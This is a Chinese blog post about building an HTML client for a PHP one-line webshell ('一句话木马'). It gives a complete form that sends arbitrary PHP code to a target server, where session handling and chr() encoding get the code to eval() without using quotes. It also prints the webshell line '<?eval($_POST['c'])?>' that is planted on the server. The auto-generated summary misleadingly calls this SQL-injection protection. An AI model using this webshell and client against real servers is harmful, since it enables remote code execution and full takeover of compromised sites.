写PHP一句话木马客户端遇到的问题

最新推荐文章于 2021-12-03 11:30:18 发布

原创最新推荐文章于 2021-12-03 11:30:18 发布 · 1.8k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #session #xhtml #input #html #c

解决的问题专栏收录该内容

7 篇文章

订阅专栏

本文介绍了一种解决PHP表单提交中SQL注入问题的方法，通过使用stripslashes()函数来去除addslashes()添加的转义字符，同时利用session进行数据处理，确保了表单提交的安全性。

前面一篇帖子的问题得到解决，在form提交表单中，因为addslashes()会在注入字符前加单引号，所以使用stripslashes()干掉！！！

不过是使用我不会的session弄的，大家看看

就这句犯了很多错误，

1、最后eval($_SSESSION[chr(99)])写成这样，没有在末尾加分号！！！

2、get_magic_quotes_gpc()总结的单词quotes拼写错误！！！！

3、用chr(99)代替字符C，以避免使用引号！！！

最后结果是！！！！！

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>PHP客户端-全模拟版</title> </head> <body> <form method="post" target="_target"> <input name="tposturl" type="text" size="130" value="http://192.168.42.128/admin/1.php" /> <input type="submit" value="点击试试效果" onclick="this.form.action=this.form.tposturl.value;" /> <input type="hidden" name="c" value="session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);" /> <textarea cols="130" rows="5" name="d"> phpinfo();

插入单文件中代码：

<?eval($_POST['c'])?>